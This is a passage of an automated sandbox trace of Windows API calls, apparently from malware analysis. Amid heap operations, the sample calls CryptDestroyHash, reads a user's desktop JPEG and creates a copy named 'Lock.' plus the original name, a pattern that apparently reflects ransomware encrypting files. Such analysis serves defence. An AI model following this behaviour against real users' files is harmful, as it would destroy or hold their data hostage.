Size=0x4) returned 0x2e54d68 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0140.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0140.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0140.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a08 [0140.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0140.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0140.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0140.837] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0140.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0140.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0140.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0140.837] CryptDestroyHash (hHash=0xa873d0) returned 1 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0140.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0140.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0140.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0140.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0140.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0140.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0140.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0140.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0141.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0141.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0141.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0141.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0141.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0141.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0141.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0141.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0141.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0141.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0141.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0141.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0141.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0141.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0141.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0141.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0141.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f05008 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0141.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0141.027] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/CSIs1Qt1V9g.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\csis1qt1v9g.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0141.028] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.028] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0141.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0141.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0141.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0141.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0141.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0141.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0141.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0141.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0141.029] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0141.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0141.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f15010 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0141.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0141.029] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.CSIs1Qt1V9g.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.csis1qt1v9g.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0141.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0141.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0141.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 